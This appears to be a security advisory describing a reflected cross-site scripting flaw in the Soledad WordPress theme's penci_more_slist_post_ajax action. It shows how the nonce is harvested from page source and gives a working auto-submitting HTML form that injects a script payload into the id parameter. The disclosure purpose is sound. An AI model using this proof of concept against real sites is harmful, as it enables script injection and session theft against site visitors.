The theme does not sanitise the {id,datafilter[type],…} parameters in its penci_more_slist_post_ajax AJAX action, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
A threat actor can collect the nonce value on the main webpage by searching for it on the ajax_var_more call:
var ajax_var_more = {"url":"https:\/\/soledaddemo.pencidesign.net\/wp-admin\/admin-ajax.php","nonce":"d6c491629c","errorPass":"<p class=\"message message-error\">Password does not match the confirm password<\/p>","login":"Email Address","password":"Password","headerstyle":"default"};
And then can create a webpage redirecting the user to a compromised version of the site such as:
```
<html>
<body onload="myform.submit()">
<form action="https://soledaddemo.pencidesign.net/wp-admin/admin-ajax.php" method="POST" name="myform">
<input type="hidden" name="action" value="penci_more_slist_post_ajax" />
<input type="hidden" name="id" value=""><script>alert`XSS-Checker`</script>" />
<input type="hidden" name="nonce" value="d6c491629c" />
</form>
</body>
</html>
```